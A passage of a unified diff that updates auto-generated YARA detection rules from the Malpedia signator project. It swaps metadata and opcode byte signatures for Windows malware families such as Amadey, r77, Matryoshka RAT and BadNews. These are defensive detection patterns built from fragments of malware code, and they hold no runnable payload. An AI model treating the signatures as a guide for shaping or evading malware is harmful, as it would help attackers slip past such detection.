+rule MALPEDIA_Win_Unidentified_107_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8131d4ba-7ab9-5f25-bfe1-80fb81c429a4"
+		id = "63234ec8-e935-5a5a-a7c8-23180ee85d34"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ntospy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ntospy_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_107"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_107_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "8fbd4c5ffc79f2d95a93b5deb7321b5b82d08f35463db086df64bd3e92a52647"
+		logic_hash = "8867f317de2ddfffcab36cc6ed6aa7b70e1fee92a8d78957e157f26440f20f17"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85227,32 +85181,32 @@ rule MALPEDIA_Win_Ntospy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5f c3 48897c2408 488d3dacf90000 }
-		$sequence_1 = { eb74 85c9 7858 3b15???????? 7350 488bca 4c8d05e5b40000 }
-		$sequence_2 = { 8bfa 4c8d0d5d740000 488bd9 488d1553740000 b916000000 4c8d053f740000 e8???????? }
-		$sequence_3 = { b808000000 486bc000 488d0deaad0000 48c7040102000000 b808000000 }
-		$sequence_4 = { 48890d???????? 488d0512f50000 488d0d3bf70000 488905???????? 48890d???????? e8???????? }
-		$sequence_5 = { 4c8d0578760000 488d15016d0000 e8???????? 4885c0 740f 488bcb }
-		$sequence_6 = { f20f1000 8b5808 e9???????? 488d05dfc70000 4a8b0ce8 }
-		$sequence_7 = { 488d0d4c710000 8364242800 41b803000000 4533c9 }
-		$sequence_8 = { c3 4883ec28 e8???????? 488bc8 488d1501040100 }
-		$sequence_9 = { 4533f6 4863ce 488d3d20f90000 488bc1 }
+		$sequence_0 = { 7582 4989d8 31d2 4c89e9 e8???????? 4989d8 }
+		$sequence_1 = { 0f1f00 8b0b ffd7 4989c4 }
+		$sequence_2 = { 4989c7 48c7c13b43f72a e8???????? 4883c464 488b4c2408 488b542410 4c8b442418 }
+		$sequence_3 = { 4883f807 7e96 8b13 4883f80b 0f8f33010000 8b03 85c0 }
+		$sequence_4 = { 4989cc 85db 0f8e16010000 488b05???????? 4531c9 4883c018 }
+		$sequence_5 = { 48b9ca0e99c700000000 e8???????? 4989c7 48b9ca0e99c700000000 e8???????? }
+		$sequence_6 = { 8b5208 4901d0 4d39c4 0f828a000000 4183c101 4883c028 4139d9 }
+		$sequence_7 = { e8???????? 8b05???????? 85c0 0f8e57ffffff 83e801 488b1d???????? 31ff }
+		$sequence_8 = { 85db 0f8e16010000 488b05???????? 4531c9 4883c018 0f1f840000000000 }
+		$sequence_9 = { 8b560c 41b830000000 488d0c10 488b05???????? }
 
 	condition:
-		7 of them and filesize < 208896
+		7 of them and filesize < 254976
 }
-rule MALPEDIA_Win_Zupdax_Auto : FILE
+rule MALPEDIA_Win_Maudi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "de5aa4fa-5f17-5443-8ded-540bc4f1be04"
+		id = "1d89cb82-59a5-5a2e-ac6c-c7d75443bace"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zupdax"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zupdax_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maudi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.maudi_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "eb046345ff3af30eb975f6808cc5770691e59266f20f528282b1aa4111a1c56b"
+		logic_hash = "d20863b5f36f8cd108ded6d29f5c3bed96160b9b4abc34b0d10161e337344d4d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85266,32 +85220,32 @@ rule MALPEDIA_Win_Zupdax_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c408 8b06 50 895e0c 895e10 }
-		$sequence_1 = { 8b4c2408 8b7e28 51 e8???????? 8b5624 52 e8???????? }
-		$sequence_2 = { 56 57 33c9 33f6 33ff 394c2414 }
-		$sequence_3 = { 7522 e8???????? 8b0d???????? 51 8b0d???????? }
-		$sequence_4 = { e8???????? 83c408 8b4618 50 895e24 }
-		$sequence_5 = { 51 e8???????? 83c418 8bc6 c3 }
-		$sequence_6 = { 895e2c e8???????? 8b460c 83c404 3bc3 }
-		$sequence_7 = { 52 e8???????? 83c408 8b06 50 895e0c 895e10 }
-		$sequence_8 = { 3bc3 7419 8b4c2408 8b7e28 51 }
-		$sequence_9 = { 8d4618 6a00 50 c706ffffffff }
+		$sequence_0 = { 61 6886180000 59 80740fff36 e2f9 }
+		$sequence_1 = { 5d bf???????? 6a40 6800100000 6886180000 6a00 }
+		$sequence_2 = { 89e5 5d 8b80a4000000 83f806 7546 }
+		$sequence_3 = { 52 68???????? 87d1 87ca 51 }
+		$sequence_4 = { 55 89e5 5d 8b80a4000000 83f806 7546 }
+		$sequence_5 = { 6804010000 56 68???????? 87d1 }
+		$sequence_6 = { 89e5 81ec04010000 56 55 89e5 5d 89e6 }
+		$sequence_7 = { ff25???????? 83c418 6a00 57 56 68???????? 87d1 }
+		$sequence_8 = { 59 59 ff25???????? 68???????? 87d1 87ca }
+		$sequence_9 = { 59 e9???????? 55 89e5 5d bf???????? 6a40 }
 
 	condition:
-		7 of them and filesize < 1032192
+		7 of them and filesize < 40960
 }
-rule MALPEDIA_Win_Forest_Tiger_Auto : FILE
+rule MALPEDIA_Win_Scieron_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3353c633-78cc-57c2-86be-460e3ac718ff"
+		id = "33fc8152-5e48-52c8-ac9b-34f4ee2aaa91"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.forest_tiger"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.forest_tiger_auto.yar#L1-L145"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scieron"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.scieron_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "fd0aad246be00ca230351bf440cc00646056cfe6bce27189395062caee48cc7c"
+		logic_hash = "dfba23a630ecd443346ae8a23831b1a493de37d653bee925abed5860ba8acc68"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85305,39 +85259,34 @@ rule MALPEDIA_Win_Forest_Tiger_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 833f01 0f94c0 84c0 7407 e8???????? eb05 e8???????? }
-		$sequence_1 = { 6bc930 8975e0 8db1c0084400 8975e4 }
-		$sequence_2 = { 4c8b4608 498bc0 488b4c2478 482bc1 }
-		$sequence_3 = { 6bc00c 56 ff90f0664300 59 }
-		$sequence_4 = { 4c8b4608 488b542478 4c2bc2 4983e0fc }
-		$sequence_5 = { 4c8b45c8 4c8b4dc0 f30f7f45d0 4c3955d0 }
-		$sequence_6 = { 6bc009 0fb68408c0724300 6a08 c1e804 }
-		$sequence_7 = { 4c8b4710 488bd7 488bcb 49ffc0 e8???????? eb0a }
-		$sequence_8 = { 4c8b45bf 488d1521350200 448bcb 488bc8 }
-		$sequence_9 = { 6aff ff15???????? 894604 85c0 7429 }
-		$sequence_10 = { 4c8b45ff 8b55db 488b4dcf e8???????? }
-		$sequence_11 = { 6aff 8d8df4fdffff 51 52 }
-		$sequence_12 = { 4c8b4750 488b33 448b7308 448b6f30 }
-		$sequence_13 = { 6aff 8d8dc8f4ffff 6880000000 51 }
-		$sequence_14 = { 6aff 8d942498010000 6880000000 52 }
+		$sequence_0 = { ffd0 85ff 7411 833d????????00 }
+		$sequence_1 = { 8b442424 33ff 217c241c 0144241c ff442410 6a10 58 }
+		$sequence_2 = { 57 eb6b 8b7c2410 3bfd }
+		$sequence_3 = { ffb614400010 83c718 ffb618400010 8d443c30 50 }
+		$sequence_4 = { c9 c3 55 8bec 51 e8???????? e8???????? }
+		$sequence_5 = { 7542 50 50 0fb78604020000 }
+		$sequence_6 = { ffd7 ffd0 6a04 8d442414 }
+		$sequence_7 = { e9???????? 81ec8c020000 53 8b1d???????? 55 33c0 57 }
+		$sequence_8 = { 8d85d8fdffff 50 ffd6 85c0 7409 }
+		$sequence_9 = { 53 6a40 ffd7 85c0 7414 }
 
 	condition:
-		7 of them and filesize < 709632
+		7 of them and filesize < 100352
 }
-rule MALPEDIA_Win_R77_Auto : FILE
+rule MALPEDIA_Win_Badnews_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b79f20de-193b-5b74-8687-5e00cdb0b22f"
+		id = "669fd264-b6d6-5d6c-8250-2eaeef7607f8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.r77"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.r77_auto.yar#L1-L158"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.badnews_auto.yar#L1-L205"
 		license_url = "N/A"
-		logic_hash = "ee9f3e01cb496a017b30e9f636bd55f0ca4c077d0d62d251be75c67533f23dc5"
+		logic_hash = "70dca6886c221c9bfe5fe7481db4825e4f99d418a6f0f0b45196e36a94b37f92"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -85349,38 +85298,45 @@ rule MALPEDIA_Win_R77_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 740c 8b4f0c e8???????? 85c0 }
-		$sequence_1 = { 740b 8b0f e8???????? 85c0 }
-		$sequence_2 = { bafeff0000 6623c2 6683f806 721a 41b803000000 }
-		$sequence_3 = { c1e202 8b4508 0fb60c10 83f91f 757d }
-		$sequence_4 = { 0f8595010000 c745e4f8630110 e9???????? 894de0 c745e4f8630110 e9???????? }
-		$sequence_5 = { ba01000000 c1e200 8b4508 0fb60c10 81f990000000 750a }
-		$sequence_6 = { c745fc???????? eb07 c745fc???????? 8b4dfc 894df8 8b5510 }
-		$sequence_7 = { 83e03f c1eb06 6bf838 8b049df8a00110 f644072801 7444 837c0718ff }
-		$sequence_8 = { b801000000 d1e0 8b4d08 0fb61401 85d2 750a }
-		$sequence_9 = { 488d157ad40000 e8???????? 8bcb 4885c0 740c 4883c420 }
-		$sequence_10 = { ff15???????? 4889442450 488bd8 48897c2458 8d7d01 4885f6 }
-		$sequence_11 = { c3 4883ec38 488d05f5d50100 4889442428 488b05???????? 4889442420 48837c242000 }
-		$sequence_12 = { 488b4c2440 e8???????? eb55 4c8b4c2458 4c8b442450 488d15f3010200 488b4c2440 }
-		$sequence_13 = { 4885db 7436 488b0d???????? 4885c9 7410 488b4910 488bd3 }
+		$sequence_0 = { ff15???????? 50 e8???????? 83c404 68???????? 6804010000 }
+		$sequence_1 = { c0e004 02c1 3423 c0c003 }
+		$sequence_2 = { c78534ffffff47657457 c78538ffffff696e646f c7853cffffff77546578 66c78540ffffff7457 }
+		$sequence_3 = { c705????????33322e64 66c705????????6c6c c605????????00 ff15???????? }
+		$sequence_4 = { a1???????? 33c5 8945fc 53 56 57 8d8534ffffff }
+		$sequence_5 = { eb02 33c9 c0e004 02c1 }
+		$sequence_6 = { 55 8bec 8b450c 3d01020000 }
+		$sequence_7 = { 68???????? 6a1a 68???????? 57 }
+		$sequence_8 = { 6a00 d1f9 68???????? 03c9 }
+		$sequence_9 = { 57 6a00 6880000000 6a04 6a00 6a01 6a04 }
+		$sequence_10 = { ffd3 85c0 7403 83c608 8a06 }
+		$sequence_11 = { ff15???????? 85c0 7405 83c004 }
+		$sequence_12 = { 68???????? ff15???????? b8???????? 83c424 8d5002 668b08 }
+		$sequence_13 = { 41 84c0 75f9 2bce 3bd1 72e4 }
+		$sequence_14 = { 8bc7 c1f805 83e71f c1e706 8b0485d0a70110 }
+		$sequence_15 = { 4b 75da 8b35???????? 8b9d50fbffff }
+		$sequence_16 = { 8bce 83e11f c1e106 8b0485d0a70110 c644080401 56 e8???????? }
+		$sequence_17 = { 6a03 8802 42 8b048dd0a70110 4e 5f 6a0a }
+		$sequence_18 = { c1e106 899528e5ffff 53 8b1495d0a70110 }
+		$sequence_19 = { 84c0 75f9 2bce 741c 804415ec03 8d4dec 42 }
+		$sequence_20 = { c7465c00350110 83660800 33ff 47 897e14 }
 
 	condition:
-		7 of them and filesize < 350208
+		7 of them and filesize < 612352
 }
-rule MALPEDIA_Win_Amadey_Auto : FILE
+rule MALPEDIA_Win_Matryoshka_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1f098ad5-f3e6-509c-99f1-f0cffd69c9f4"
+		id = "e67f9b00-164c-59e2-9dc8-5dd2e0d5203f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.amadey_auto.yar#L1-L210"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.matryoshka_rat_auto.yar#L1-L142"
 		license_url = "N/A"
-		logic_hash = "fb6578b6e50d377be8fb88ae4d5eeeb58ec3e463dc3822773f271e1c55398ad5"
+		logic_hash = "e984417b389a4155a102710aa04d6d8dad2d1f007db82c883ebc84c4c1b44825"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -85392,43 +85348,36 @@ rule MALPEDIA_Win_Amadey_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5b 8be5 5d c3 5f c6040e00 8bc6 }
-		$sequence_1 = { 57 ff15???????? 85c0 75d9 bb01000000 }
-		$sequence_2 = { 68???????? eb42 e8???????? 83f801 7431 e8???????? }
-		$sequence_3 = { 83ec18 8bcc 68???????? e8???????? 8d4db4 }
-		$sequence_4 = { 8a0402 88040f 41 8b7dfc 8d4201 }
-		$sequence_5 = { 68???????? e8???????? 8d4dcc e8???????? 83c418 }
-		$sequence_6 = { 0f434d20 40 50 52 6a02 6a00 51 }
-		$sequence_7 = { 83f811 7413 e8???????? 83f812 7409 6a01 68???????? }
-		$sequence_8 = { 68???????? e8???????? 8d4d98 e8???????? 83c418 }
-		$sequence_9 = { 8b8d78feffff 42 8bc1 81fa00100000 7214 }
-		$sequence_10 = { 83fa10 722f 8b8d78feffff 42 }
-		$sequence_11 = { 8b85f49fffff 40 89442404 8d85f8bfffff 890424 e8???????? }
-		$sequence_12 = { 8d55c8 89442404 891424 e8???????? 85c0 7523 }
-		$sequence_13 = { c745fc05000000 c70424???????? e8???????? 890424 e8???????? 84c0 }
-		$sequence_14 = { 8d85d8fdffff 890424 e8???????? e8???????? 89442404 }
-		$sequence_15 = { 89e5 b828200000 e8???????? 817d08???????? 0f84be000000 }
-		$sequence_16 = { e8???????? 8b45dc 890424 e8???????? 83ec04 }
-		$sequence_17 = { c745fc0c000000 8b45fc c9 c3 }
-		$sequence_18 = { 55 89e5 81ec48040000 e8???????? 89c2 c744241c00020000 8d85f8fbffff }
-		$sequence_19 = { 56 57 8b3d???????? 83ec18 }
-		$sequence_20 = { 722f 8b8d60feffff 42 8bc1 }
+		$sequence_0 = { b037 c3 b073 c3 }
+		$sequence_1 = { c3 b06f c3 b063 c3 }
+		$sequence_2 = { 8b46fc 8947fc 49 75ed }
+		$sequence_3 = { 750a 488bcb e8???????? eb0f 488bd3 488d0df7520400 }
+		$sequence_4 = { 7509 bb99ffffff 85db 740d 488bcf }
+		$sequence_5 = { 8b4648 48 48 7446 48 }
+		$sequence_6 = { 750a 4883c310 0fba2f11 eb27 41b807000000 488d152bb50200 }
+		$sequence_7 = { 8b4704 8b3491 890491 8bd6 }
+		$sequence_8 = { 750a 443b774c 8d4399 0f45d8 450137 }
+		$sequence_9 = { 750a 4883c30a 0fba2f12 eb4a 41b808000000 488d153eb50200 }
+		$sequence_10 = { 8b4704 8bf1 33d1 81e6ff030000 }
+		$sequence_11 = { 8b4660 89471c 8d4670 894724 }
+		$sequence_12 = { 8b4664 034668 8b4e60 03ca }
+		$sequence_13 = { 7509 c7412400000002 eb4c 48394130 }
 
 	condition:
-		7 of them and filesize < 908288
+		7 of them and filesize < 843776
 }
-rule MALPEDIA_Win_Chainshot_Auto : FILE
+rule MALPEDIA_Win_Jaff_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c772e981-fe05-5ad7-89cb-7e4d2195fea3"
+		id = "e0c41ef8-0a92-555f-b34f-5db2f4589c45"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chainshot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.chainshot_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.jaff_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "d57daacb16b1510f9da9be332e06c34916e951db79264a72675c1b37600885e5"
+		logic_hash = "6a4dc9720f78e5a6e283d3b622047ad1fb4dc38cefeb255d404c0bdb257eb37c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85442,32 +85391,32 @@ rule MALPEDIA_Win_Chainshot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffc9 7433 ffc9 7438 ffc9 742b ffc9 }
-		$sequence_1 = { 7427 83e803 0f844a110000 83f802 0f857b0f0000 }
-		$sequence_2 = { 7708 7519 66892c5e eb13 66892c5e bf7a000780 eb08 }
-		$sequence_3 = { eb23 8b4520 8906 eb1c b90b000080 eb05 }
-		$sequence_4 = { 83c705 c7041f4c8b4424 c6441f0418 83c705 c7041f4c8b4c24 }
-		$sequence_5 = { e8???????? 89442420 85c0 7826 }
-		$sequence_6 = { ffd0 8905???????? b90b000080 894c2420 e9???????? }
-		$sequence_7 = { 747a ffc8 7461 83e802 }
-		$sequence_8 = { 7408 ffd1 8905???????? b84b000080 }
-		$sequence_9 = { 0f8599000000 c705????????0b000000 e9???????? b902000000 }
+		$sequence_0 = { 395604 760b 8b36 0fb73456 8975f4 }
+		$sequence_1 = { 8b55c8 33c0 8bca 85d2 7419 8b75c4 66833c4600 }
+		$sequence_2 = { 8b4de0 8b3d???????? 51 6a00 ffd7 50 }
+		$sequence_3 = { 668b144a 66891448 41 3b4e04 72f0 8b4e04 }
+		$sequence_4 = { ffd7 50 ffd3 8b7d0c 8b4f04 }
+		$sequence_5 = { 50 6a00 ffd7 50 ff15???????? 5f 8bc6 }
+		$sequence_6 = { 56 8945f8 ffd3 8945fc 83f808 7705 }
+		$sequence_7 = { 41 3b4df8 76a8 8b4d08 80790c00 740d 8b5510 }
+		$sequence_8 = { 8b4ddc 8b3d???????? 51 6a00 ffd7 50 ffd3 }
+		$sequence_9 = { 0fb70448 eb02 33c0 0fbff0 2b45f4 0fbffa 03f7 }
 
 	condition:
-		7 of them and filesize < 802816
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Rombertik_Auto : FILE
+rule MALPEDIA_Win_Mebromi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fd5d6ec1-b599-5122-939f-30fe62c6e74a"
+		id = "3d64e85a-906f-5ddb-9f75-04eb426f7ebc"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rombertik"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rombertik_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mebromi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mebromi_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "1bd4f27874587acc7747c5d4ae5b510eeb7a9ee716658437468f5342433983ca"
+		logic_hash = "051f5b8119e90ef14be758def00ef62b697ce727969ed9523ac57414d0773faf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85481,32 +85430,32 @@ rule MALPEDIA_Win_Rombertik_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? 56 ff15???????? 85c0 7559 8b5e10 33ff }
-		$sequence_1 = { 40 49 75f9 8955f8 85d2 }
-		$sequence_2 = { 0f94c0 84c0 750d 47 3b7d0c 72c9 }
-		$sequence_3 = { 47 41 3bfb 72be 8b5df0 }
-		$sequence_4 = { 85c0 7426 8d95f8feffff 52 }
-		$sequence_5 = { 8d4de4 51 8955e8 8b55fc 6a00 52 }
-		$sequence_6 = { 8bec 81ec3c030000 53 56 57 bf00010000 }
-		$sequence_7 = { 8d8ddcfdffff 8bf0 51 56 }
-		$sequence_8 = { 68???????? 50 56 e8???????? 83c414 a3???????? }
-		$sequence_9 = { 81c900ffffff 41 8a9c0d00ffffff 889c0500ffffff }
+		$sequence_0 = { 5f eb26 8d4508 8db694702900 6a00 }
+		$sequence_1 = { b82c2900d8 2c29 0000 2d29008a46 0323 }
+		$sequence_2 = { 8bec 8b4508 ff348520712900 ff15???????? }
+		$sequence_3 = { eb0f 0fb6d2 f68201a0290004 7403 }
+		$sequence_4 = { 56 ffd7 3bdd 5b }
+		$sequence_5 = { 68000000c0 68???????? ff15???????? 8b3d???????? 83f8ff a3???????? 7544 }
+		$sequence_6 = { 58 c20c00 ff05???????? 833d????????01 55 56 57 }
+		$sequence_7 = { 68???????? ff742410 ff15???????? 8bf0 85f6 7416 57 }
+		$sequence_8 = { 8888009f2900 eb1f 83f861 7213 83f87a }
+		$sequence_9 = { ff742410 ff15???????? 8bf0 85f6 7416 57 56 }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Cloudburst_Auto : FILE
+rule MALPEDIA_Win_Jupiter_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "66798bc9-d5a7-5171-afa8-26e587fd1d6d"
+		id = "75f69a27-2335-5e55-aba0-ab6c4b24c511"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudburst"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cloudburst_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jupiter"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.jupiter_auto.yar#L1-L113"
 		license_url = "N/A"
-		logic_hash = "4402c4459a61713f167f313847e8e10fbc4c4d6c965b37f16be2690ee599b8f7"
+		logic_hash = "9a9545049cbc95230bffe2c6ee7b65da4bdadff47104616baed37c8cd6306b50"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85520,34 +85469,34 @@ rule MALPEDIA_Win_Cloudburst_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33d3 41891424 4133d3 4189542404 }
-		$sequence_1 = { 49ffc0 eb39 0fb6c1 43c6041825 }
-		$sequence_2 = { 4585c0 743e 488b0d???????? 4c8d4c2448 488bd7 }
-		$sequence_3 = { 45330c24 45894c2410 4133d1 4189542414 448bc2 4533442408 }
-		$sequence_4 = { 0f8cb0000000 48897c2450 4c89642458 488bfe }
-		$sequence_5 = { 4d8bf8 440fb6420c 41c1e108 4c8d35a3e5ffff 41c1e008 c1e708 }
-		$sequence_6 = { 418bea 4589542440 33eb 8bc5 }
-		$sequence_7 = { c744245068000000 48894598 c744247004010000 c745a004010000 }
-		$sequence_8 = { 418bc6 99 83e20f 03c2 8bc8 83e00f 3bc2 }
-		$sequence_9 = { 418b4424fc 418942fc 4183bf0002000001 0f8e3d010000 90 458b4c24e0 41ffc6 }
+		$sequence_0 = { c605????????01 66c705????????0101 c605????????01 c605????????01 }
+		$sequence_1 = { 8a4147 884104 8a4146 884105 8b4144 c1f808 884106 }
+		$sequence_2 = { 884104 8a4146 884105 8b4144 c1f808 884106 8a4144 }
+		$sequence_3 = { 8a4146 884105 8b4144 c1f808 884106 }
+		$sequence_4 = { c605????????01 c605????????01 66c705????????0101 c605????????01 }
+		$sequence_5 = { 8a4147 884104 8a4146 884105 }
+		$sequence_6 = { c605????????01 66c705????????0101 c605????????01 c605????????01 66c705????????0101 c605????????01 }
+		$sequence_7 = { 884104 8a4146 884105 8b4144 }
+		$sequence_8 = { 52 52 6802000000 6803000000 }
+		$sequence_9 = { 8a4146 884105 8b4144 c1f808 }
 
 	condition:
-		7 of them and filesize < 2363392
+		7 of them and filesize < 224112
 }
-rule MALPEDIA_Win_Roopy_Auto : FILE
+rule MALPEDIA_Win_Graphdrop_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8be7b2c4-b174-500b-b0ea-f2839cb0b383"
+		id = "237c51dc-e941-5d7c-b6d3-2562536d7e1c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.roopy_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphdrop"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.graphdrop_auto.yar#L1-L106"
 		license_url = "N/A"
-		logic_hash = "e98d1af71e72ca48289280b30ed691a17624b5a4815404358ace55f7593ba961"
+		logic_hash = "0e6707eb4bbec74f1d6caa5a7e229009514fcba8c763f4b645f99a1b6c93d629"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -85559,32 +85508,32 @@ rule MALPEDIA_Win_Roopy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d45c0 30c9 ba38000000 e8???????? c745c0504b0606 8d45a8 }
-		$sequence_1 = { 8b45f8 c7401400000000 8b45f8 e8???????? c745f401000000 }
-		$sequence_2 = { 6631d2 8d85d8feffff e8???????? 8d45dc 30c9 6631d2 }
-		$sequence_3 = { 8b09 ff5164 8345f401 8b45f8 8b4004 e8???????? }
-		$sequence_4 = { c78580fdffff00000000 c78584fdffff00000000 c7858cfeffff00000000 31c0 }
-		$sequence_5 = { 6631c9 ba03010000 e8???????? 8b85b8feffff ba???????? }
-		$sequence_6 = { c7406000000000 8b45f4 c7406400000000 8b45f4 83785c00 770b 7210 }
-		$sequence_7 = { 30c9 6631d2 e8???????? 0fb745fc 68ff000000 8d8dd8feffff baffffffff }
-		$sequence_8 = { d805???????? d80d???????? 895df0 897df4 0fba65f41f df6df0 7306 }
-		$sequence_9 = { 8b52fc 29c2 8d4a01 8d5001 8b45fc e8???????? 89d8 }
+		$sequence_0 = { 4155 0f77 53 90 }
+		$sequence_1 = { 4155 49c7c501000000 4150 4152 415a 4158 }
+		$sequence_2 = { 0f77 4157 90 415f }
+		$sequence_3 = { 0f77 0f77 415d 90 }
+		$sequence_4 = { 50 58 5a 49ffc9 }
+		$sequence_5 = { 0f77 0f77 5b 0f77 }
+		$sequence_6 = { 90 0f77 415c e9???????? }
+		$sequence_7 = { 49c7c501000000 4150 4152 415a }
+		$sequence_8 = { 4150 4152 415a 4158 }
+		$sequence_9 = { 0f77 4155 0f77 4150 }
 
 	condition:
-		7 of them and filesize < 739328
+		7 of them and filesize < 4186112
 }
-rule MALPEDIA_Win_Spider_Rat_Auto : FILE
+rule MALPEDIA_Win_Voidoor_Auto : FILE
